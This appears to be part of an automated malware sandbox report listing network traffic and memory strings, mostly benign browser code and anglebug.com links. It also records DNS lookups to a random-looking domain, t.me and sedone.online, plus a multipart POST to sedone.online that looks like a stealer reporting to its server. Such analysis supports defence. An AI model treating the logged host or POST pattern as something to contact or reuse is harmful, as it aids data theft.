            Source: global trafficHTTP traffic detected: GET /b2?rn=1734353246083&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=162DEC371C56639E2ED8F9601DDC6260&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1AFead9f10fa09f955f00c51734353247; XID=1AFead9f10fa09f955f00c51734353247
            Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1734353246082&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=e2a72ac00ca647b3b10ce7fbf880fcd7&activityId=e2a72ac00ca647b3b10ce7fbf880fcd7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=EB08ABDCA4E94A6AB90EB65C1E9EB8D9&MUID=162DEC371C56639E2ED8F9601DDC6260 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1; SM=T
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
            Source: chrome.exe, 00000011.00000003.2014558922.00006C7800FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2013055966.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2013645043.00006C780100C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
            Source: chrome.exe, 00000011.00000003.2014558922.00006C7800FA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2013055966.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2013645043.00006C780100C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
            Source: global trafficDNS traffic detected: DNS query: IuwKjpytGYqQ.IuwKjpytGYqQ
            Source: global trafficDNS traffic detected: DNS query: t.me
            Source: global trafficDNS traffic detected: DNS query: sedone.online
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
            Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
            Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
            Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
            Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
            Source: global trafficDNS traffic detected: DNS query: assets.msn.com
            Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EUAIEC2689RIEUKNOH47User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: sedone.onlineContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
            Source: chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
            Source: chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
            Source: chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2202579022.000047B800398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2202579022.000047B800398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2202579022.000047B800398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2202579022.000047B800398000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
            Source: chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
